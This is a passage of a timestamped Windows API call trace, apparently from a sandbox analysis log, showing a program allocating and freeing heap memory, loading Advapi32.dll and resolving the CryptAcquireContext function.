dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0141.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0141.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.849] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.849] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0141.849] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0141.849] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0141.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0141.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0141.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0141.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.850] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0141.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0141.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0141.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0141.851] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0141.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0141.852] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0141.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.852] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0141.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0141.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0141.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0141.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0141.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0141.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0141.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0141.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0141.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0141.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0141.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0141.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0141.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0141.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0141.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0141.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.928] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.929] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0141.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0141.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0141.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0141.931] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69888 [0141.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69888, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0141.931] HeapFree (in: 